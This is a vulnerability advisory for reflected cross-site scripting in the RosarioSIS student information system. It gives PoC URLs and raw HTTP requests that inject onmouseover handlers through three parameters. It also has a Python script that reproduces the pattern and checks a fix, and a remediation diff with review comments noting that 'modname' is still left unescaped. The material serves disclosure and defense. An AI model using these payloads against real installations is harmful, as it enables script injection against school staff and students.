Reflected Cross-Site Scripting in different locations
A reflected cross-site scripting vulnerability in Preferences.php, PrintSchedules.php, and Search.inc.php in RosarioSIS Student Information System < 6.7.2 allows remote attackers to execute arbitrary JavaScript in a victim's browser by embedding it in the 'tab', 'include_inactive', and 'advanced' parameters of a GET request. The parameter values are reflected unescaped into a quoted HTML attribute, so a value such as `1"onmouseover="...` closes the attribute and adds an event handler to the tag.
Field | Details |
---|---|
Vulnerability type: | Cross-Site Scripting (XSS) |
Vendor of the product(s): | RosarioSIS |
Affected product(s)/code base: | Tested on version 6.7.2 |
Has vendor confirmed or acknowledged the vulnerability: | Yes |
Attack type: | Reflected XSS |
Impact (CIA subvector): | C:L/I:L/A:N |
Affected component: | modules/Users/Preferences.php, modules/Scheduling/PrintSchedules.php, and modules/Users/Search.inc.php |
Attack vector(s): | Remote |
Proof of concept (PoC): | Details below |
Reference(s): | #291 (closed) |
CVSS v3.1 details: | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (base score 6.1, Medium) |
PoC links:
# e1
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com`
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1"onmouseover%3d"alert(`xss`)
# Full redirect injection PoC
GET /Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com` HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: RosarioSIS=<Cookie>
"include_inactive" in modules/Scheduling/PrintSchedules.php has the same issue.
PoC links:
# e1
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22alert(1)%22style%3d%22
# Full redirect injection PoC
GET /Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22 HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0
"advanced" in modules/Users/Search.inc.php has the same issue.
PoC links:
# e1
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1%22onmouseover%3d%22alert(`xfr`)%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`"
# Full redirect injection PoC
GET /Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`" HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0
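The following script is an added example, not code from this advisory or from RosarioSIS. It models the pattern behind all three PoCs above: a request value concatenated into a form's `action` attribute (the `render_vulnerable` function is a constructed stand-in for the affected modules, mirroring the concatenation visible in the remediation diff), a hardened rendering that encodes the value for both contexts it passes through (URL query, then HTML attribute), and a response checker that decides whether the reflected value escaped the attribute and became an `on*` event handler. The payloads are the URL-decoded values from the PoC links above; everything else (function names, the `MODNAMES` mapping, the constructed HTML) is an assumption of this example, and it runs offline.

```python
"""
Reflected-XSS reproduction and fix check for the 'tab', 'include_inactive'
and 'advanced' parameters. Added example; the render_* functions are
constructed stand-ins for the affected modules, not RosarioSIS code.
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# PoC link e2 for 'tab' (from the advisory) and the URL-decoded payloads of
# the three PoCs, keyed by the parameter they target.
POC_TAB_URL = ('http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php'
               '&tab=1"onmouseover%3d"alert(`xss`)')
PAYLOADS = {
    "tab": '1"onmouseover="alert(`xss`)',
    "include_inactive": '1"onmouseover="alert(1)"style="',
    "advanced": '1"onmouseover="alert(`xfr`)"',
}
# modname used by each PoC request (assumption: taken from the PoC URLs).
MODNAMES = {
    "tab": "Users/Preferences.php",
    "include_inactive": "Scheduling/PrintSchedules.php",
    "advanced": "Users/User.php",
}


def param_from_poc(url: str, name: str) -> str:
    """Recover the raw parameter value the server sees for a PoC link."""
    return parse_qs(urlsplit(url).query)[name][0]


def render_vulnerable(modname: str, param: str, value: str) -> str:
    """Unpatched pattern: request values concatenated straight into the
    action attribute (constructed stand-in for the module's echo)."""
    return (f'<form action="Modules.php?modname={modname}&{param}={value}"'
            ' method="POST">')


def render_hardened(modname: str, param: str, value: str) -> str:
    """Encode for both contexts the value passes through: URL-encode it as
    a query value, then HTML-escape the whole URL for the attribute."""
    url = "Modules.php?" + urlencode({"modname": modname, param: value})
    return f'<form action="{html.escape(url, quote=True)}" method="POST">'


# Minimal attribute scanner for the first <form> tag in a response body.
# An attribute name may directly follow a closing quote (a="b"c="d"), which
# is exactly what the payloads rely on; values may be "..", '..' or bare.
FORM_TAG_RE = re.compile(r"<form\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(
    r"""([A-Za-z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def form_attributes(body: str) -> dict[str, str]:
    """Attributes of the first <form> tag, lower-cased name -> value."""
    tag = FORM_TAG_RE.search(body)
    if not tag:
        return {}
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(tag.group(0)):
        attrs[name.lower()] = dq or sq or bare
    return attrs


def injected_handlers(body: str) -> list[str]:
    """Event-handler attributes (on*) on the form tag: any hit means the
    reflected value broke out of the action attribute."""
    return sorted(k for k in form_attributes(body) if k.startswith("on"))


def reflected_value(body: str, param: str):
    """Value the action URL carries for `param` after the browser decodes
    the attribute; None if the parameter was lost."""
    action = html.unescape(form_attributes(body).get("action", ""))
    values = parse_qs(urlsplit(action).query).get(param)
    return values[0] if values else None


def check_all() -> dict[str, tuple[list[str], list[str], bool]]:
    """Per parameter: handlers injected by the vulnerable rendering,
    handlers left by the hardened rendering, and whether the hardened
    rendering still carries the original value unchanged."""
    results = {}
    for param, payload in PAYLOADS.items():
        vuln = render_vulnerable(MODNAMES[param], param, payload)
        safe = render_hardened(MODNAMES[param], param, payload)
        results[param] = (injected_handlers(vuln), injected_handlers(safe),
                          reflected_value(safe, param) == payload)
    return results


if __name__ == "__main__":
    assert param_from_poc(POC_TAB_URL, "tab") == PAYLOADS["tab"]
    for param, (before, after, intact) in check_all().items():
        print(f"{param}: vulnerable={before} hardened={after} intact={intact}")
```

Against a live target, feed the response body of each PoC request to `injected_handlers()`: a non-empty list confirms the breakout, an empty list with `reflected_value()` still returning the payload confirms a fix that encodes rather than strips.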
Remediation example (the patched file is diffed against its `.bk` backup, so the `<` lines are the fix and the `>` lines are the original code):
root@bd410a977728:/usr/src/rosariosis# diff ./modules/Users/Preferences.php ./modules/Users/Preferences.php.bk
126,128c126,127
< $ttt = $_REQUEST['tab'];
< $ttt = htmlspecialchars(strip_tags($ttt));
< echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&tab=' . $ttt . '" method="POST">';
---
>
> echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&tab=' . $_REQUEST['tab'] . '" method="POST">';
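Review bot: the fix in the `<` lines escapes only `$_REQUEST['tab']`, while `$_REQUEST['modname']` is still concatenated unescaped into the same `action` attribute on the `echo` line and needs the same treatment. The value also travels through a URL query string before landing in the attribute, so the appropriate encoding is `rawurlencode()` on the value followed by `htmlspecialchars()` with `ENT_QUOTES` passed explicitly on the attribute (before PHP 8.1 the default flags do not escape single quotes); `strip_tags()` adds no protection in an attribute context and can silently alter legitimate values. If `tab` only ever takes a known set of values, validating against that set server-side is preferable to relying on output escaping alone.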
root@bd410a977728:/usr/src/rosariosis#